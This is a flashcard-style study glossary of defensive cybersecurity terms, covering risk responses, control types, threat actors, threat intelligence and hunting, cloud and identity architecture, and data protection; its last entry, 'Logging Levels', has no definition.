The location where security professionals monitor and protect critical information assets in an organization.
Definition
The location where security professionals monitor and protect critical information assets in an organization.
Term
Cybersecurity service-level objectives (SLOs)
Definition
are the standards that organizations and their leadership must meet to ensure the security of their network. These objectives help measure and assess how well security operations protect the organization's assets and assure its customers and stakeholders that systems and data are safe and secure.
Term
Risk Responses Risk management principles
Definition
[image]
Term
Risk avoidance
Definition
In risk mitigation, the practice of ceasing activity that presents risk.
Risk avoidance often means that you stop doing an activity that is risk-bearing
Term
Risk acceptance
Definition
he response of determining that a risk is within the organization's appetite and no countermeasures other than ongoing monitoring is needed.
Risk acceptance means continuing to operate without change after evaluating an identified risk item.
Term
Risk mitigation
Definition
The response of reducing risk to fit within an organization's willingness to accept risk.
By implementing effective mitigating controls, we can reduce the overall risk. We implement mitigating controls until risk levels are reduced to a level deemed "acceptable" by risk managers and governance teams.
Term
Risk transference
Definition
In risk mitigation, the response of moving or sharing the responsibility of risk to another entity, such as by purchasing cybersecurity insurance.
Risk transference (or sharing) means assigning risk to a third party, which is most typically accomplished through insurance policies
Term
Risk Management Exceptions
Definition
For example, a different risk response might be warranted, like avoidance. Circumstances may warrant a risk exception if a different risk response is not reasonable or feasible. Issuing a risk exception is a serious decision and must include careful documentation identifying why the risks are concerning and specific justifications describing why an exception is warranted.
Term
Threat modeling
Definition
The process of identifying and assessing the possible threat actors and attack vectors that pose a risk to the security of an app, network, or other system.
Threat modeling is designed to identify the principal risks and tactics, techniques and procedures (TTPs) that a system may be subject to by evaluating the system both from an attacker's point of view and from the defender's point of view.
Term
Technical Control
Definition
§The control is implemented as a system (hardware, software, or firmware). For example, firewalls, antivirus software, and OS access control models are technical controls. Technical controls may also be described as logical controls.
Term
Operational
Definition
The control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls rather than technical controls.
Term
Managerial Control
Definition
The control gives oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.
Term
Preventative
Definition
A type of security control that acts before an incident to eliminate or reduce the likelihood that an attack can succeed.
§A preventative control operates before an attack can take place. Access control lists (ACL) configured on firewalls and file system objects are preventative-type controls. Antimalware software also acts as a preventative control, by blocking processes identified as malicious from executing. Directives and standard operating procedures (SOPs) can be thought of as administrative versions of preventative controls.
Term
Detective
Definition
A type of security control that acts during an incident to identify or record that it is happening.
§The control may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A detective control operates during the progress of an attack. Logs provide one of the best examples of detective-type controls.
Term
Corrective
Definition
A type of security control that acts after an incident to eliminate or minimize its impact
The control acts to eliminate or reduce the impact of an intrusion event. A corrective control is used after an attack. A good example is a backup system that can restore data that was damaged during an intrusion. Another example is a patch management system that acts to eliminate the vulnerability exploited during the attack.
Term
Compensating
Definition
A security measure that takes on risk mitigation when a primary control fails or cannot completely meet expectations.
The control serves as a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection but uses a different methodology or technology.
Term
Responsive Control
Definition
A type of security control that serves to direct corrective actions after an incident has been confirmed.
In a Security Operations Center (SOC), responsive controls might include several very well-defined actions to be taken by an analyst after identifying a specific issue. These actions are often documented in a playbook.
Term
Prioritization & Escalation
Definition
After identifying vulnerabilities, they must be classified according to their severity and potential impact on the organization. Vulnerabilities with the highest severity and potential impact must be prioritized and addressed first, while those with lower severity and potential impact can be addressed later. It is also important to ensure that any high-severity vulnerabilities are escalated to all relevant stakeholders to ensure they are informed and can contribute to the response as necessary.
Term
threat actor
Definition
Person or entity responsible for an event that has been identified as a security incident or as a risk.
Term
attack surface
Definition
The points at which a network or application receive external connections or inputs/outputs that are potential vectors to be exploited by a threat actor.
Each piece of software, service, and every enabled protocol on an endpoint offers a unique opportunity for attack. Removing or disabling as many of these as possible can significantly reduce the number of (potentially) exploitable pathways into a system. Additionally, default configurations typically favor functionality and compatibility over security, so it is essential to understand how to customize a system to allow for the most secure type of operation, not necessarily the most convenient.
Term
on-premises
Definition
Software or services installed and managed on a customer’s computing infrastructure rather than in the cloud or hosted by a third-party provider.
Term
Passive discovery (attack surface)
Definition
Passive discoverycan be a practical approach to managing the attack surface. Passive discovery describes the methods used to identify systems, services, and protocols indirectly. Passive discovery, such as network packet capture, can reveal information about network-connected hosts, communications channels, protocols in use, and activity patterns. Passive discovery is beneficial as it leverages careful observation to show characteristics of network-connected software and devices.
Term
Edge discovery
(Attack Surface)
Definition
Edge discoveryseeks to define the "edge" of the network fully. It is easy to assume that the edge is composed only of Internet-facing servers. The edge is instead composed of every device with Internet connectivity.Assuming that attacks will occur from the Internet, anything accessible to it must be considered as part of the edge.
Term
Security Control Testing
Definition
For these reasons, a testing plan must be in place and designed to validate controls are functioning as intended. For example, validating that firewalls only allow the right traffic to pass, that endpoint protection is operating properly on employee workstations, and that web application firewalls correctly identify and block injection attacks to name just a few.
Term
Penetration Testing
Definition
A penetration test involves hiring a trusted offensive security expert to fill the role of an attacker, tasking them to exploit the environment and evaluate the effectiveness of existing protections. The penetration test includes a findings report crafted with details regarding identified weaknesses and recommended remediations.
Term
Adversary Emulation
Definition
Another type of penetration test, referred to as adversaryemulation, seeks to mimic the actions of known threat actor groups. The MITRE ATT&CK®framework typically forms the basis of this type of assessment. After a threat assessment identifies threat actor groups, the ATT&CKframework provides details regarding their tactics, techniques, and procedures (TTPs). Emulating these TTPs helps assess whether existing protections are sufficient to stop attacks characteristic of the threat actor.
Term
Bug Bounty
Definition
involves offering rewards for responsible disclosure of vulnerabilities
Bug bounties allow organizations to define areas of their environment they would like help protecting. The bug bounty identifies elements of the environment that are in scope for testing and the rewards available for reporting issues. This approach incentivizes offensive security professionals to assess controls on an ongoing basis and can also help identify unknown and undocumented vulnerabilities.
Term
ATTACK SURFACE REDUCTION Asset inventory
Definition
§Conducting an inventory of all hardware and software assets and user accounts in the environment. Once identified, the team must determine which assets are essential for business operations and which can be removed.
Term
ATTACK SURFACE REDUCTION
Access control
Definition
Implementing strict access control measures, such as multifactor authentication, can reduce the attack surface significantly. Limiting access to sensitive data and systems reduces the risk of unauthorized access.
Term
Patching and updating
ATTACK SURFACE REDUCTION
Definition
Regularly patching and updating software and firmware can prevent attackers from exploiting known vulnerabilities. Patching should be performed via automated patch management systems.
Term
Network segmentation
ATTACK SURFACE REDUCTION
Definition
Segmenting a large network into smaller subnets can limit the damage an attacker can cause. By segmenting the network, the breaches and infections can be more effectively contained, thereby reducing the attack surface.
Term
Removing unnecessary components
ATTACK SURFACE REDUCTION
Definition
§Removing hardware or software components reduces the attack surface. By removing software, the organization eliminates a pathway that attackers can exploit.
Term
Employee training
ATTACK SURFACE REDUCTION
Definition
Employee training can help reduce the attack surface by raising awareness of the potential risks and the importance of security measures. Regular training can help employees recognize and report potential security threats, reducing the likelihood of successful attacks
Term
Maintenance Windows
Definition
Many organizations adopt routine maintenance windows so administrators can perform maintenance tasks during these pre-established times. Maintenance windows enable preventative maintenance and consistent deployment of noncritical patches. All work planned during maintenance windows should comply with change management policies.
Term
nation-states
Definition
A type of threat actor that is supported by the resources of its host country's military and security services.
Term
organized crime
Definition
A type of threat actor that uses hacking and computer fraud for commercial gain.
Term
hacktivist
Definition
A threat actor that is motivated by a social issue or political cause
A hacktivist group, such as Anonymous, WikiLeaks, or LulzSec, uses cyber weapons to promote a political agenda.
Term
insider threat
Definition
Type of threat actor who is assigned privileges on the system and causes an intentional or unintentional incident.
Term
script kiddie
Definition
An inexperienced, unskilled attacker that typically uses tools or scripts created by other
A script kiddie is someone who uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or reasonable goal other than gaining attention or proving technical abilities. They can still cause significant harm and/or damage without proper safeguards and preparations.
Term
Supply Chain Access
Definition
. These outside sources form the supply chain and can be exploited to gain access to an otherwise secured environment.For example, a vendor may supply software products so an attacker can work to gain access to the software supplier, whose security practices may be lackluster, to insert malicious code into the vendor software prior to delivery to the target organization.Similarly, an attacker can target a managed services organization that may have VPN access to several valuable targets. Lastly, an attacker may target an equipment supplier in order to insert malware, vulnerable hardware/software, or rogue components that are assembled into the final product
Term
advanced persistent threat (APT)
Definition
An attacker's ability to obtain, maintain, and diversify access to network systems using exploits and malware.
APTs typically target large organizations, such as financial institutions, companies in healthcare, and other organizations that store large volumes of personally identifiable information (PII), especially when the PII describes important government and political figures.
Term
exploits
Definition
A specific method by which malware code infects a target host, often via some vulnerability in a software process.
Term
Metasploit
Definition
A platform for launching modularized attacks against known software vulnerabilities
Term
persistence
Definition
In cybersecurity, the ability of a threat actor to maintain covert access to a target host or network.
Term
Tactics, techniques, and procedures (TTPs)
Definition
Analysis of historical cyberattacks and adversary actions.
Term
user and entity behavior analytics (UEBA)
Definition
A system that can provide automated identification of suspicious activity by user accounts and computer hosts.
Term
Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
Definition
A knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and procedures.
Term
Reconnaissance
Definition
The actions taken to gather information about an individual or organization's computer systems and software. This typically involves collecting information such as the types of systems and software used, user account information, data types, and network configuration
Term
Open-source intelligence (OSINT)
Definition
Publicly available information plus the tools used to aggregate and search it.
Term
Publicly available information (OSINT)
Definition
An attacker can harvest information from public repositories and web searches. Available information includes categories such as the IP addresses of an organization's DNS servers; the range of addresses assigned to the organization; names, email addresses, and phone numbers of contacts within the organization; and the organization's physical address. This data is publicly available through Whois records, Securities and Exchange Commission (SEC) filings, telephone directories, and more.
Term
Social media (OSINT)
Definition
Attackers can use social media sites like Facebook and LinkedIn to find an organization's information. Depending on how much an organization or an organization's employees choose to share publicly, an attacker may find posts or user profiles that give away sensitive information or simply act as another vector or target for the attacker to take advantage of.
Term
HTML code (OSINT)
Definition
The HTML code of an organization's web page can provide information, such as IP addresses and names of web servers, operating system versions, file paths, and names of developers or administrators. The layout and organization of the code can reveal development practices, capabilities, and level of security awareness.
Term
Metadata (OSINT)
Definition
Attackers can run metadata scans on publicly available documents using a tool like Fingerprinting Organizations with Collected Archives (FOCA). For example, Microsoft Office documents posted on the Internet may not directly divulge sensitive information about an organization, but an attacker could extract useful information from its metadata, including the names of authors or anyone that made a change to the document. By using search engines, FOCA (https://github.com/ElevenPaths/FOCA) can cross-reference files with other domains to find and extract metadata.
Term
Government bulletins
(Defensive OSINST)
Definition
The government is responsible for protecting the country's constituents and the national infrastructure and publishing a wide variety of information and advice regarding observed threats. For example, the Department of Homeland Security and the Cybersecurity and Infrastructure Agency publish several types of cybersecurity guidance, including basic informational content and binding operational directives that federal agencies must implement.
Term
computer emergency response team (CERT)
Definition
The goal of a computer emergency response team (CERT) is to mitigate cybercrime and minimize damage by responding to incidents quickly. They work with local law enforcement, federal agencies, and other organizations to help prevent cyberattacks. CERTs coordinate responses to major events like natural disasters or terrorist attacks. Because of this, CERTs can provide knowledge and information regarding trending and observed attacks.
Term
computer security incident response team (CSIRT)
Definition
A computer security incident response team (CSIRT) is a group responsible for responding to security incidents involving computer systems. The team typically consists of information security professionals, network administrators, system administrators, legal representatives, and other stakeholders. The team’s goal is to respond to security incidents quickly and effectively while minimizing the impact to the organization.
Term
dark web
Definition
Resources on the Internet that are distributed between anonymized nodes and protected from general access by multiple layers of encryption and routing
The dark web serves as an operating platform for many cybercrimes. Threat actors utilize the dark web to organize their efforts and sell products such as credit card numbers, drugs, weapons, and malware. Observing this activity can provide insight to threat actor activities, future attacks, information regarding current tactics, and evidence of previously undiscovered breaches.
Term
Internal sources (Defensive OSINT)
Definition
It is important to consider that evidence regarding active threats, reconnaissance activities, and suspicious behavior exists within the environment being protected. Activity logs are a goldmine of information and operational insight and must be continuously collected and analyzed.
Term
Timeliness (Confidence levels)
Definition
The speed at which threat data is collected and disseminated to ensure it is up-to-date and relevant.
Term
Relevancy (Confidence levels)
Definition
The usefulness of the data in the context of a specific threat and the actionable insights and meaningful context it provides.
Term
Accuracy (Confidence levels)
Definition
The reliability and correctness of the threat data. For example, ensuring it is free from errors, bias, or false information.
Term
Closed-source
Definition
Closed-source data is derived from the provider's own research and analysis efforts, such as data from honeynets that they operate, plus information mined from its customers' systems, suitably anonymized.Most of the commercial feed (sometimes referred to as a paid feed) providers also market their own platform for processing and disseminating threat intelligence. There are also platform providers who do not produce their own security feeds.
Term
Information Sharing and Analysis Centers (ISACs)
Definition
A not-for-profit group set up to share sector-specific threat intelligence and security best practices among its members.
Information Sharing and Analysis Centers (ISACs) provide critical infrastructure owners and operators with cybersecurity information and services. They facilitate the sharing of threat information and best practices between the public and private sectors, allowing for the protection of vital assets. ISACs also provide advice on current and emerging cyber threats, helping to ensure a more secure cyber landscape.
Term
Incident Response (Threat Intelligence Sharing)
Definition
Threat intelligence sharing can help organizations respond to security incidents more effectively by providing information about threat actors' tactics, techniques, and procedures (TTPs). By sharing information with other organizations, incident responders can better understand the threat landscape and develop more effective incident response plans.
Term
Vulnerability Management
(Threat Intelligence Sharing)
Definition
Threat intelligence sharing can help organizations identify and prioritize vulnerabilities more effectively. Organizations can quickly identify and mitigate potential risks by sharing information about emerging threats and vulnerabilities before attackers exploit them.
Term
Risk Management (Threat Intelligence Sharing)
Definition
Threat intelligence sharing can help organizations manage risk more effectively by providing insight into emerging threats and attack trends. By leveraging threat intelligence, organizations can make more informed decisions about where to allocate resources and which security controls to implement to reduce risk
Threat intelligence sharing can also help inform security engineering efforts. By understanding the TTPs threat actors use, security engineers can design and implement more effective security controls to prevent and detect attacks.
Term
threat hunting
Definition
A cybersecurity technique designed to detect presence of threats that have not been discovered by normal security monitoring
The purpose of threat hunting is to analyze routine activities and network traffic to identify potential anomalies indicative of malicious actions which may result in a complete breach.Threat hunting describes the methods used to identify malicious cyber activities within an organization's network in a systematic way. Threat hunting subscribes to an "assume breach" mentality; a crucial strategy designed to help protect against advanced cyberattacks, mitigate any intrusion's impact, and develop a procedural approach to cyber resilience.
Term
cyber threat intelligence
Definition
The process of investigating, collecting, analyzing, and disseminating information about emerging threats and threat sources
Term
lateral movement
Definition
The process by which an attacker is able to move from one part of a computing environment to another
Term
indicators of attack (IoAs)
Definition
Signs or clues indicating a malicious attack on a system or network is currently occurring. These include, but are not limited to, unusual network traffic, strange log file entries, or suspicious user account activity
Term
Crowdsourced
Definition
A process in which a large group of individuals, usually from the public, are asked to contribute to a project or task. It often involves the collection of ideas, information, opinions, or feedback from a wide range of people, typically through an online platform.
Term
managed security service providers (MSSP)
Definition
A third-party provision of security configuration and monitoring as an outsourced service.
Term
Misconfiguration Hunting (Focus Areas)
Definition
Misconfigurations in IT systems can create vulnerabilities that attackers can exploit. Misconfiguration hunting involves searching for misconfigured systems, services, or applications that attackers could exploit, including searching for weak passwords, open ports, or unpatched software.
Term
Isolated Network Hunting (Focus Areas)
Definition
Isolated networks, such as air-gapped networks or networks with limited connectivity to the internet, are often thought to be more secure. However, attackers can still target these networks by exploiting vulnerabilities in connected systems or through physical access. Isolated network hunting involves searching for vulnerabilities in physical access points that could be used to gain access to the isolated network.
Term
Business-critical Asset Hunting (Focus Areas)
Definition
Attackers often target business-critical assets, such as databases, servers, or applications. Business-critical asset hunting involves searching for vulnerabilities and threats that could impact these assets by searching for unauthorized access attempts, unusual traffic patterns, or suspicious activity that could indicate an attack. An organization's processes used to manage critical assets can also be targeted, such as new user creation, money transfer, access permission approvals, and other similar high-risk functions.
Term
Indicators of compromise (IoCs)
Definition
A sign that an asset or network has been attacked or is currently under attack.
Indicators of compromise (IoCs) are essentially pieces of forensic data providing evidence of a potential intrusion into a system or network. An IoC indicates a high likelihood of unauthorized access to a system or that a successful attack has occurred.
Indicators of compromise (IoCs) can be identified using digital forensics techniques, which analyze digital artifacts left behind on a compromised system or network.These artifacts include logfiles, memorydumps, networktraffic, and filesysteminformation.
Some common IoCs include unusual outbound network traffic (such as large volumes of outbound DNS traffic), logins occurring from unexpected geographic locations, suspicious privileged user account behavior, unusual changes in log files, protocols associated with command-and-control activities, traffic to known questionable URLs or IP addresses, and distributed denial-of-service (DDoS) attacks.
Term
privileged user account
Definition
A user account with elevated access to a system and that is granted additional permissions that other user accounts do not have. These additional permissions allow privileged users to perform administrative tasks and access sensitive data.
Term
distributed denial-of-service (DDoS)
Definition
An attack that involves the use of infected Internet-connected computers and devices to disrupt the normal flow of traffic of a server or service by overwhelming the target with traffic.
Term
Active Defense
Definition
An active defense describes using offensive actions to outmaneuver an adversary to make an attack harder to execute. An active approach to cyber defense seeks to increase the likelihood that hackers will make a mistake and expose their existence or methods of attack. Active defense approaches can stop attacks in progress while gaining a greater understanding of attacker methodology.
Term
Honeypots
Definition
A host, network, or file set up with the purpose of luring attackers away from assets of actual value and/or discovering attack strategies and weaknesses in the security configuration
Term
High-interaction honeypots
Definition
A design to mimic real production systems, making it difficult for attackers to tell the difference between the honeypot and a real system. This aims to capture more detailed attack information than can be accomplished by using a low-interaction honeypot, allowing security teams to understand an attacker better.
Term
Active decoy
Definition
A system designed to distract potential attackers away from an organization's critical systems and data. It creates a false environment that looks like a real system, complete with fake data, applications, and other elements. The decoy system is closely monitored to detect malicious activity and provide early warning and detailed insight into an attacker's tactics and techniques
Term
Active decoy
Definition
A system designed to distract potential attackers away from an organization's critical systems and data. It creates a false environment that looks like a real system, complete with fake data, applications, and other elements. The decoy system is closely monitored to detect malicious activity and provide early warning and detailed insight into an attacker's tactics and techniques
Term
intrusion detection systems
Definition
A security appliance or software that analyzes data from a packet sniffer to identify traffic that violates policies or rules.
Term
System hardening
Definition
A process of making a host or app configuration secure by reducing its attack surface, through running only necessary services, installing monitoring software to protect against malware and intrusions, and establishing a maintenance schedule to ensure the system is patched to be secure against software exploits
Term
SAM Windows Registry Files stored in C:\Windows\System32\Config
Definition
Security Accounts Manager (SAM) stores username information for accounts used on the current computer
Term
SECURITY
Windows Registry Files stored in C:\Windows\System32\Config
Definition
Linked to the security database of the domain the current user is logged onto
Term
SOFTWARE Windows Registry Files stored in C:\Windows\System32\Config
Definition
Contains settings for software and the Windows operating system
Term
SYSTEM
Windows Registry Files stored in C:\Windows\System32\Config
Definition
Contains settings for drivers and file systems
Term
DEFAULT
Windows Registry Files stored in C:\Windows\System32\Config
Definition
Contains settings for the LocalSystem account profile
Term
Initialization file (INI) configuration file format standards
Definition
Uses key-value pairs associated using "=".
Term
eXtensible Markup Language (XML) configuration file format standards
Definition
Uses tag formatting similar to HTML and is often used by APIs to exchange information.
Term
YAML Ain’tMarkup Language (YAML™) configuration file format standards
Definition
YAML files use ":" and careful indentation to associate groups of settings and are an increasingly popular format.
Term
JavaScript Object Notation (JSON) configuration file format standards
Definition
Similar formatting to YAML with the addition of {} and [] brackets to group settings. Typically, associated applications are written using JavaScript.
Term
System Processes
Definition
System processes are background tasks that run on a computer without user interaction and often without the user's knowledge. System processes, such as the operating system kernel and other system services, are essential for the operating system to manage system resources, such as memory, network connections, and hardware devices. System processes can also be used to launch applications and perform other tasks. Examples of system processes include antivirus scans, disk defragmentation, user authentication, printing, and system updates.
Term
Hardware Architecture
Definition
Hardware architecture describes the underlying technology used by a device to perform computational tasks. Operating systems and applications are designed to run on a specific hardware architecture. Different architectures emphasize different characteristics, such as scalability, raw processing power, power management, and other features. ARM and x86 architectures are common, with x86 dominating desktops, laptops, and server computers, and ARM architectures dominant in smartphones, tablets, and single-board computers like the Raspberry Pi. Software designed to run on one architecture cannot run on another without the use of an emulator.
Term
Virtualization
Definition
A computing environment where multiple independent operating systems can be installed to a single hardware platform and run simultaneously.
Term
containers,
Definition
An operating system virtualization deployment containing everything required to run a service, application, or microservice
Term
microservices
Definition
A software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology.
Term
application virtualization
Definition
A software delivery model where the code runs on a server and is streamed to a client.
Term
Containerization
Definition
Application cell/container virtualization dispenses with the idea of a hypervisor and instead enforces resource separation at the operating system level. The OS defines isolated "cells" for each user instance to run in. Each cell or container is allocated CPU and memory resources, but the processes all run through the native OS kernel. These containers may run slightly different OS distributions but cannot run guest OSs of different types (you could not run Windows or Ubuntu in a Red Hat Linux container, for instance). Alternatively, the containers might run separate application processes, in which case the variables and libraries required by the application process are added to the container.
One of the best-known container virtualization products is Docker (docker.com)
[image]
Term
cloud deploymentmodel
Definition
Classifying the ownership and management of a cloud as public, private, community, or hybrid.
A cloud deploymentmodel is a specific model or style of cloud computing. A cloud deployment model defines how an organization distributes applications and services and where data is stored. It also helps to determine how many resources are available for specific applications.
Term
Public cloud
Definition
Cloud that is deployed for shared use by multiple independent tenants.
Public cloudis designed for public access and geared toward those without the budget, resources, or desire to build and manage a private cloud or data center. Services are hosted on a third-party infrastructure and accessed via the Internet. Examples include Amazon AWS, Microsoft Azure, Google Cloud, Linode, IBM Cloud, Oracle Cloud, and many others.
Term
Private cloud
Definition
Cloud that is deployed for use by a single entity.
Private cloudis designed, built, and managed in-house using hardware provided by a cloud provider service. Private clouds provide high levels of control over the infrastructure, but they typically require more up-front capital and ongoing maintenance than a public cloud.
Term
hybrid cloud
Definition
Cloud deployment that uses both private and public elements.
A hybrid cloudgenerally refers to the combination of resources in both a public and private cloud. It is a type of cloud computing that combines on-premises infrastructure—or a private cloud—with a public cloud. By doing this, organizations can benefit from the scalability and cost-effectiveness of the public cloud while maintaining the security and control of their private cloud.
Term
Serverless
Definition
A software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances
offerings, services such as authentication, web applications, and communications aren't developed and managed as applications running on VM instances within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. When the client requires some operation to be processed, the cloud spins up a container to run the code, performs the processing, and then destroys the container. Billing is based on execution time rather than hourly charges.
Term
" virtual private cloud (VPC)
Definition
A private network segment made available to a single cloud consumer on a public cloud
Term
Software-defined networking (SDN)
Definition
APIs and compatible hardware/virtual appliances allowing for programmable network appliances and systems.
abstracts physical network devices, like routers and switches, replacing them with a virtual control plane that makes all decisions regarding traffic management. SDN allows for building cloud-based networks using virtualized equivalents of physical routers, firewalls, and other network devices used in on-premises networks. SDN architectures support security applications because the central controller allows data planes to be rapidly reprogrammed using automated provisioning and policy-based controls.
Term
Zero Trust architectures
Definition
Zero Trust architectures assume that nothing should be taken for granted and that all network access must be continuously verified and authorized. Any user, device, or application seeking access must be authenticated and verified. Zero Trust differs from traditional security models based on simply granting access to all users, devices, and applications contained within an organization's trusted network.
Term
key benefits of a Zero Trust architecture
Definition
§Greater security—All users, devices, and applications authenticated and verified before network access.
§Better access controls—More stringent limits regarding who or what can access resources and from what locations resources can be accessed.
§Improved governance and compliance—Limits on data access and greater operational visibility on user and device activity.
§Increased granularity—Users granted access to what they need when they need it.
Term
Secure Access Service Edge (SASE)
Definition
A networking and security architecture that provides secure access to cloud applications and services while reducing complexity. It combines security services like firewalls, identity and access management, and secure web gateway with networking services such as SD-WAN.
Term
Two-Factor Authentication (2FA)
Definition
Strong authentication mechanism that requires a user to submit two different types of credential, such as a fingerprint scan plus PIN. Often, the second credential is transmitted via a second trusted device or account. This is also referred to as 2-step verification.
Term
Authentication Factors
Definition
Something You Know
A knowledge factor such as a password or PIN.
Something You Have
A physical factor such as an object in your possession such as a card or token.
Something You Are
A physiological attribute, biometrics, such as fingerprint, hand-vein, facial recognition, and others.
Term
out-of-band mechanism
Definition
Use of a communication channel that is different than the one currently being used
out-of-band mechanism, generates a software token on a server and sends it to a resource assumed to be safely controlled by the user.
Term
In-band authentication
Definition
Use of a communication channel that is the same as the one currently being used.
In-band authentication describes the use of authentication factors that rely on the same system requesting the authentication; for example, providing username and password credentials on a standalone server.
Term
standalone server.
Definition
A server that is not integrated into a Microsoft Active Directory domain
Term
Passwordless Authentication
Definition
Passwordless authentication is a method by which users can access an account without entering a password. This type of authentication relies on biometric authentication, such as facial recognition, fingerprint scanning, voice recognition, or a one-time code sent to a user's email address or phone number. Passwordless authentication methods are gaining popularity as organizations look for methods to improve the quality, reliability, and rigor of authentication. Passwordless authentication offers a method of authentication that cannot be easily shared (unlike a password) and removes the burden of remembering passwords from employees. Passwordless authentication allows devices to recognize authorized users by using their unique physical characteristics instead of their memory of a password.
Term
Single sign-on (SSO)
Definition
Authentication technology that enables a user to authenticate once and receive authorizations for multiple services.
Term
Privileged Access Management (PAM)
Definition
Policies, procedures, and support software for managing accounts and credentials with administrative permissions.
PAM solutions can store the login credentials of privileged accounts in a secure repository and require additional authentication measures for any entity wishing to use them. Doing so tracks and logs who accessed and used privileged credentials at any time, allowing for greater awareness and visibility into their use.
Term
Federation
Definition
A process that provides a shared login capability across multiple systems and enterprises. It essentially connects the identity management services of multiple systems
Federation means that the company trusts accounts created and managed by a different network. As another example, a person might want to use both Google Apps and Twitter. If Google and Twitter establish a federated network for the purpose of authentication and authorization, then the user can log on to Twitter using his or her Google credentials or vice versa.
Term
OpenID
Definition
An identity federation method that enables users to be authenticated on cooperating websites by a third-party authentication service
OpenID is a method of authenticating users with certain sites that participate in an OpenID system. This enables them to retain a single account for all participating sites. A user will register with an OpenID system in a given domain like they would with any other account. A site under this OpenID domain will then give the user the option to sign in using this system. Thenthe site contacts its external OpenID provider in order to verify that the login credentials supplied by the user are correct. Large companies, such as Google and Amazon, use their own OpenID systems. OpenID Direct adds a layer of authentication to OAuth 2.0, the latest version of the protocol.
Term
Security Assertion Markup Language (SAML)
Definition
An XML-based data format used to exchange authentication information between a client and a service
Term
Simple Object Access Protocol (SOAP)
Definition
An XML-based web services protocol that is used to exchange messages.
Term
Shibboleth
Definition
An identity federation method that provides single sign-on capabilities and enables websites to make informed authorization decisions for access to protected online resources.
Shibboleth is a federated identity method based on SAML and is often used by universities and public service organizations.In a Shibboleth implementation, a user attempts to retrieve resources from a Shibboleth-enabled website, which then sends SAML authentication information over URL queries. The user is then redirected to an identity provider with which they can authenticate using this SAML information. The identity provider then responds to the service provider (the Shibboleth-enabled website) with the proper authentication information. The site validates this response and grants the user access to certain resources based on their SAML information.
Term
trust model
Definition
In PKI, a description of how users and different CAs exchange information and certificates.
Term
cloud access security broker (CASB)
Definition
Enterprise management software designed to mediate access to cloud services by users across all types of devices.
Term
CASBs are implemented in one of three ways
Forward proxy
Definition
This is a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy. This requires configuration of users' devices or installation of an agent. In this mode, the proxy can inspect all traffic in real time, even if that traffic is not bound for sanctioned cloud applications. The problem with this mode is that users may be able to evade the proxy and connect directly. Proxies are also associated with poor performance as without a load balancing solution they become a bottleneck and potentially a single point of failure.
Term
CASBs are implemented in one of three ways
Reverse proxy
Definition
This is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with policy. This does not require configuration of the users' devices. This approach is only possible if the cloud application has proxy support.
Term
CASBs are implemented in one of three ways Application programming interface (API)
Definition
Rather than placing a CASB appliance or host inline with cloud consumers and the cloud services, an API-based CASB brokers connections between the cloud service and the cloud consumer. For example, if a user account has been disabled or an authorization has been revoked on the local network, the CASB would communicate this to the cloud service and use its API to disable access there too. This depends on the API supporting the range of functions that the CASB and access and authorization policies demand. CASB solutions are quite likely to use both proxy and API modes for different security management purposes.
Term
Data loss prevention (DLP)
Definition
A software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks.
. Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without a proper authorization
Term
Personally identifiable information (PII)
Definition
Data that can be used to identify or contact an individual (or, in the case of identity theft, to impersonate them).
Term
Protected Health Information(PHI)
Definition
Data that can be used to identify an individual and includes information about past, present, or future health, as well as related payments and data used in the operation of a healthcare business.
Term
Personally Identifiable Financial Information (PIFI)
Definition
Personal information about a consumer provided to a financial institution that can include account number, credit/debit card number, name, social security number and other information.
Term
Cardholder data (CHD)
Definition
Any type of personally identifiable information (PII) associated with a person who has a payment card, such as a credit or debit card
Cardholder data (CHD)is information related to the owner of a payment card, such as a credit or debit card. This data includes the cardholder's name, card number, expiration date, billing address, and security code (CVV). Protections for cardholder data are provided in industry standards and privacy regulations such as Payment Card Industry Data Security Standard (PCIDSS), the General Data Protection Regulation (GDPR), Gramm-Leach-Bliley Act (GLBA), and others.
Term
Intellectual property (IP)
Definition
Data that is of commercial value and can be granted rights of ownership, such as copyrights, patents, and trademarks
Intellectual property (IP)describes intangible products of human thought and ingenuity. Intellectual property is protected by various laws such as copyrights, patents, trademarks, and trade secrets. Intellectual property often represents vast sums of investment money and research time and provides significant competitive or military advantage.
Term
Public key infrastructure (PKI)
Definition
Framework of certificate authorities, digital certificates, software, services, and other cryptographic components deployed for the purpose of validating subject identities.
Term
Secure socket layer (SSL)
Definition
The original, obsolete version of the security protocol now developed as TLS.
Term
Secure Sockets Layer (SSL) Inspection
Definition
Secure socket layer (SSL) inspection is the process of inspecting encrypted HTTPS traffic. Without SSL inspection, network administrators cannot monitor encrypted traffic for threats, making HTTPS traffic an easy method for attackers to avoid detection. SSL inspection is also essential for verifying that website certificates are valid, helping protect against on-path (man-in-the-middle) attacks, where an attacker intercepts communications between two parties, and detecting traffic encrypted with anything other than a trusted third-party certificate. SSL inspection also helps enforce organizational policies, ensuring that employees comply with acceptable use policies and do not attempt to access restricted content or share/upload restricted data. SSL inspection is often accomplished by installing digital certificates on end devices that allow encrypted traffic to be intercepted, decrypted, and inspected by security tools or software before being re-encrypted and forwarded to the intended destination. Web proxies, load balancers, next-gen firewalls, and similar devices all support this capability.
Term
Log Ingestion
Definition
Log ingestion describes collecting log data from multiple sources, such as authenticationservers, applicationservers, webservers, and databases, and storing it in a centralized location for analysis. It often involves using logging tools like Splunk and Logstash to collect and process log data from these systems to provide a comprehensive view of the infrastructure and the activities taking place within it.
Term
Time Synchronization
Definition
Time synchronization ensures that computer systems have accurate system time and time-related information by synchronizing the system time with a reference time source, using Network Time Protocol (NTP), an atomicclock, or a globalpositioningsystem(GPS). Time synchronization is essential to establish a clear event order.
Term
Logging Levels
Definition
